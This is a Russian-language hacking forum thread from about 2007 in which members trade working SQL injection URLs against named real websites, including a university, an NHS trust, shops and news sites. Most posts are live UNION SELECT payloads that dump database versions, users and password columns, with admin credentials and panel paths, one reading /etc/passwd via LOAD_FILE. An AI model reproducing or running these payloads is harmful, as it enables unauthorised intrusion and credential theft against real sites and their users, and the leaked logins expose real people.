SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Fr-Ron

    Fr-Ron Elder - Старейшина

    Joined:
    10 Sep 2006
    Messages:
    184
    Likes Received:
    72
    Reputations:
    13
    1) Не осилил =(

    2) Осилил, гуд. Пароли без шифровки, присутствуют мейлы!!!

    admin:HellBoy:[email protected]
     
  2. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://www.grinderclinic.ru/index.php?section=-1+union+select+convert(version()+using+cp1251)/*
    ничего интересного не нашел..
    Code:
    http://www.rustrana.ru/new.php?nid=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14/*&new=1
    аналогично.. лень перебирать таблицы :( потыркал наугад и забил)
     
    3 people like this.
  3. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    Code:
    http://www.linkdump.be/index.php?y=-2003+union+select+1,2,user,4,5,6,7,8+from+users/*&m=9
    колонку с пасами не нашёл =(
     
    1 person likes this.
  4. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    http://www.facilities.upenn.edu


    University of Pennsylvania

    Code:
    http://www.facilities.upenn.edu/mapsBldgs/view_map.php3?id=-407+union+select+1,2,3,4,concat(version(),0x3a,user(),0x3a,database()),6,7,8,9,10,11/*
     
  5. valiko

    valiko Elder - Старейшина

    Joined:
    28 Jan 2007
    Messages:
    152
    Likes Received:
    144
    Reputations:
    19
    есть подозрение, что пароль в третьем столбце ;)
    Code:
    http://www.linkdump.be/index.php?y=-2003+union+select+u.*+from+users+u/*&m=9
    
    а сопоставить с логином - по id или email
    Code:
    http://www.linkdump.be/index.php?y=-2003+union+select+1,2,id,user,email,6,7,8+from+users/*&m=9
     
    #1665 valiko, 5 Apr 2007
    Last edited: 6 Apr 2007
    1 person likes this.
  6. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    shop
    Code:
    http://www.velocity.la/viewnewsarticle.php?id=-8+union+select+1,2,username,password,5,6,7+from+admin/*
    http://www.velocity.la/admin
    user:admin
    pass:admin
    Code:
    http://www.skirtsinadvertising.com/interview.php?id=-1+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
     
    2 people like this.
  7. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    Code:
    http://www.ukmotoringdirectory.co.uk/motoring.php?id=2025+UNION+SELECT+null,null,convert(VERSION()+using+latin1),null,null,null,convert(password+using+latin1),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+admin/*
    [I]админка: http://www.ukmotoringdirectory.co.uk/admin[/I]
    
    http://www.chathamhouse.org.uk/index.php?id=5&cid=110 
    [I]19 колонок, 3 версия[/I]
    
    http://www.southcentral.nhs.uk/page.php?id=182%20group%20by%209/*
    [I]срабатывает редирект :(
    версия 4.0.26 
    база nhssc_db[/I]
    спасибо -={x_Lex}=- за помощь
     
    4 people like this.
  8. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    еле допёр какие там поля в таблице.
     
    4 people like this.
  9. random

    random Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    50
    Likes Received:
    54
    Reputations:
    11
    Code:
    http://www.hotelcammerpoorte.be/index.php?page=-1+union+select+1,2,3,4,concat(username,0x3a,password),6+from+users/*&lang=EN
    user: Admin
    password: 1000
    http://www.hotelcammerpoorte.be/admin.php
     
  10. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Вывод в title
    __:)__
     
    1 person likes this.
  11. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.4iper.net/article.php?doc_id=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
     
    2 people like this.
  12. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    Code:
    http://peoplehost.com/support/kb2.php?q_id=-1+union+select+1,concat(version(),char(58),user()),3,4,5,6,7/*
    Code:
    http://quizfarm.com/test.php?q_id=-1+union+select+1,concat(table_name,0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+INFORMATION_SCHEMA.TABLES+limit+21,22/*
    Code:
    http://www.sinemrenault.com/trk/renault/haberler.php?H_ID=-1+union+select+1,convert(version()+using+latin1),3,4,5,6+from+users/*
    Code:
    http://www.radata.com/store/index.php?hid=-1+union+select+1,concat(convert(username+using+latin1),0x3a,convert(password+using+latin1)),3+from+user+limit+0,1/*
    Code:
    http://www.mersin.edu.tr/icerik.php?hid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat(user,0x3a,password),26+from+mysql.user/*
    Code:
    http://www.saglikbilgisi.com/haber.php?hid=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql.user/*
     
    3 people like this.
  13. ShadOS

    ShadOS ы

    Joined:
    11 Feb 2007
    Messages:
    667
    Likes Received:
    351
    Reputations:
    413
    Наугад выбрал:
    Code:
    http://www.bendruomenes.lt/news.php?id=-1+UNION+select+1,2,3,4,5,concat(version(),char(58),user()),7,8,9,10/*
    А вот здесь на сайте c приветствием "Welcome to my website. My name is Jem and I'm a l33t PHP ninja." версия выводится в строку адреса:
    Code:
    http://www.jemjabella.co.uk/postbyid.php?id=-1+UNION+SELECT+concat(version(),char(58),user())/*
    Я долго ржал.
     
    #1673 ShadOS, 6 Apr 2007
    Last edited: 6 Apr 2007
    4 people like this.
  14. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    2ShadOS
    ну тогда уж сразу вывел бы данные или это уже не в моде? ;)
    Code:
    http://www.bendruomenes.lt/news.php?strid=-23412+union+select+concat(username,char(58),password)+from+users/*
     
    2 people like this.
  15. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Code:
    http://www.oebu.ch/de/artikel.php?id=-324+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71)/*
    Code:
    http://www.rueleon.net/manifestations.php?Id=-51+union+select+LOAD_FILE(0x2f6574632f706173737764)/*
     
    2 people like this.
  16. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.spbdrive.ru/autoworld.php?news_id=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9/*
    http://www.spbdrive.ru/autoworld.php?news_id=-1+union+select+1,2,3,4,5,6,7,8,9+from+users/*
    Code:
    http://www.pomoyka.org/index.php?part=f&id=-1+union+select+1,convert(concat(database(),char(58),user(),version()),char),3,4/*
     
    3 people like this.
  17. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    2ShadOS
    повидимому ты не прочитал предыдущий мой пост
    Code:
    http://www.avilys.lt/index.php?id='+UNION+select+concat(name,char(58),pass)+from+admins/*
     
    3 people like this.
  18. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    боян, небоян хз.
    Вытащил все, юзеров перебираем лимитом
    Code:
    http://www.cahiersdufoot.net/article.php?id=-1322+union+select+1,2,3,concat_ws(char(58),version(),user(),database()),user,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user/*
     
    1 person likes this.
  19. ShadOS

    ShadOS ы

    Joined:
    11 Feb 2007
    Messages:
    667
    Likes Received:
    351
    Reputations:
    413
    а вот здесь blind. У меня опыта маловато чтобы что-то сделать дальше:
    Code:
    http://leidykla.ktu.lt/main.php?ID=-1)+UNION+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
     
    1 person likes this.
  20. _GaLs_

    _GaLs_ Elder - Старейшина

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    версия MySql
    Code:
    http://www.afghannews.net/index.php?newsgroup=6+union+select+null,VERSION(),null,null,null,null,null,null,null,null,null,null,null/*
    логин текущего пользователя базы данных
    http://www.afghannews.net/index.php?newsgroup=6+union+select+null,USER(),null,null,null,null,null,null,null,null,null,null,null/*

    имя используемой базы данных
    http://www.afghannews.net/index.php?newsgroup=6+union+select+null,DATABASE(),null,null,null,null,null,null,null,null,null,null,null/*

    И ещё если за мест null поставить попарядку 1,2,3 .... то на страничке дабавится цифра 8 )))))
     
    #1680 _GaLs_, 6 Apr 2007
    Last edited: 6 Apr 2007
    1 person likes this.
Thread Status:
Not open for further replies.